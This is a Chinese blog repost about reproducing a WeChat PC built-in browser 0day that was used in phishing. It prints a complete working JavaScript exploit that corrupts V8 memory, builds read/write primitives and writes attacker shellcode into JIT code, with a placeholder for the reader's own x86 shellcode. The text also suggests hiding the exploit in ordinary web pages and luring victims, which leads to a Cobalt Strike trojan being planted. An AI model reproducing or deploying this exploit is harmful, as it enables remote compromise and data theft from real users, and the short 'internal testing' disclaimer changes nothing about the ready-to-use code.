推荐# Web

微信默认自带浏览器存在0day钓鱼复现

                                             开局一张图

56684-qaizdffj3l.png

63911-z7d0mg00fnc.png
通过大佬分析,此次攻击复现主要过程如下:

1,攻击者利用某信(PC版)0day构造恶意的钓鱼链接,通过某信将钓鱼链接发送给目标受害者。

2,当目标受害者通过某信打开攻击者的钓鱼链接时,将触发该漏洞。从而导致目标受害者PC被植入CS木马,木马进程为:** soft.exe,并创建了称为dotnet_v4 .3的系统服务。

3,随后,攻击者可以进一步进行敏感信息的窃取。

71612-h23hag0bcz6.png

一,主要的JS脚本如下:

ENABLE_LOG = true;
IN_WORKER = true;

// run calc and hang in a loop
var shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的

function print(data) {
}

var not_optimised_out = 0;
var target_function = (function (value) {

if (value == 0xdecaf0) {
    not_optimised_out += 1;
}
not_optimised_out += 1;
not_optimised_out |= 0xff;
not_optimised_out *= 12;

});

for (var i = 0; i < 0x10000; ++i) {

target_function(i);

}

var g_array;
var tDerivedNCount = 17 * 87481 - 8;
var tDerivedNDepth = 19 * 19;

function cb(flag) {

if (flag == true) {
    return;
}
g_array = new Array(0);
g_array[0] = 0x1dbabe * 2;
return 'c01db33f';

}

function gc() {

for (var i = 0; i < 0x10000; ++i) {
    new String();
}

}

function oobAccess() {

var this_ = this;
this.buffer = null;
this.buffer_view = null;

this.page_buffer = null;
this.page_view = null;

this.prevent_opt = [];

var kSlotOffset = 0x1f;
var kBackingStoreOffset = 0xf;

class LeakArrayBuffer extends ArrayBuffer {
    constructor() {
        super(0x1000);
        this.slot = this;
    }
}

this.page_buffer = new LeakArrayBuffer();
this.page_view = new DataView(this.page_buffer);

new RegExp({ toString: function () { return 'a' } });
cb(true);

class DerivedBase extends RegExp {
    constructor() {
        // var array = null;
        super(
            // at this point, the 4-byte allocation for the JSRegExp `this` object
            // has just happened.
            {
                toString: cb
            }, 'g'
            // now the runtime JSRegExp constructor is called, corrupting the
            // JSArray.
        );

        // this allocation will now directly follow the FixedArray allocation
        // made for `this.data`, which is where `array.elements` points to.
        this_.buffer = new ArrayBuffer(0x80);
        g_array[8] = this_.page_buffer;
    }
}

// try{
var derived_n = eval(`(function derived_n(i) {
    if (i == 0) {
        return DerivedBase;
    }

    class DerivedN extends derived_n(i-1) {
        constructor() {
            super();
            return;
            ${"this.a=0;".repeat(tDerivedNCount)}
        }
    }

    return DerivedN;
})`);

gc();
new (derived_n(tDerivedNDepth))();

this.buffer_view = new DataView(this.buffer);
this.leakPtr = function (obj) {
    this.page_buffer.slot = obj;
    return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
}

this.setPtr = function (addr) {
    this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
}

this.read32 = function (addr) {
    this.setPtr(addr);
    return this.page_view.getUint32(0, true, ...this.prevent_opt);
}

this.write32 = function (addr, value) {
    this.setPtr(addr);
    this.page_view.setUint32(0, value, true, ...this.prevent_opt);
}

this.write8 = function (addr, value) {
    this.setPtr(addr);
    this.page_view.setUint8(0, value, ...this.prevent_opt);
}

this.setBytes = function (addr, content) {
    for (var i = 0; i < content.length; i++) {
        this.write8(addr + i, content[i]);
    }
}
return this;

}

function trigger() {

var oob = oobAccess();

var func_ptr = oob.leakPtr(target_function);
print('[*] target_function at 0x' + func_ptr.toString(16));

var kCodeInsOffset = 0x1b;

var code_addr = oob.read32(func_ptr + kCodeInsOffset);
print('[*] code_addr at 0x' + code_addr.toString(16));

oob.setBytes(code_addr, shellcode);

target_function(0);

}

try{

print("start running");
trigger();

}catch(e){

print(e);

}

二,html调用JS
34506-15rt28r0tj4.png

这里这是一个例子,详细的可以扩展一下思路。

例如:隐藏在正常的网页里?

15849-p134pijbiw8.png

三,诱导

65765-xrseocj1ah.png

然后就有可开头的那张图

声明:

本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

文章转载自:洛米唯熊

本文经授权后发布,本文观点不代表立场,转载请联系原作者。
从WEB弱口令到获取集权类设备权限的过程
« 上一篇 03-22

相关推荐

推荐CS4.1真的有后门吗?

文章来源:酒仙桥六号部队前言CS是什么?可能是某款历史久远的第一人称射击游戏,也可能是某个电影。由于法律原因我们这里并不指出CS是什么,但网络江湖上一直流...